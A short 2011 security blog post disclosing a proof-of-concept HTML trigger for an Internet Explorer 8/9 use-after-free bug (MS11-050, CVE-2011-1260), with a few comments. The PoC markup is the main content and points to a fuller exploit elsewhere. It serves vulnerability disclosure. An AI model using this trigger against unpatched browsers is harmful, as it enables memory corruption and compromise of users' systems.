Friday, June 17, 2011

:::SPAS3C-SV-005:::IE8/9 USE-AFTER-FREE VULNERABILITY POC (ZDI-11-194/MS11-050/CVE-2011-1260)

Just the PoC for my latest IE use-after-free vulnerability (a finding that was not only mine):


<STYLE>
object{
float: left;
}
</STYLE>
<acronym>
hggssssssssssssssssssssssssddddddddddddddddddddddddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadddddddddddddddddddddddddddddddddddddddddddddddddddddddd
</acronym>
<object>
head
</object>
<col>
ccc
</col>
<div style = 'layout-grid-char: 35735636357357354ex;'>
aaaaaa
</div>

You will find awesome work, an exploit, and even new targets (IE6/IE7) on d0c_s4vage's blog.

More references:

3 comments:

d0c.s4vage said...

Nice work! At least somebody got some use out of it :^)

José A. Vázquez said...

hehe Thanks ;)

José A. Vázquez said...

@d0c.s4vage...and thanks very much for your update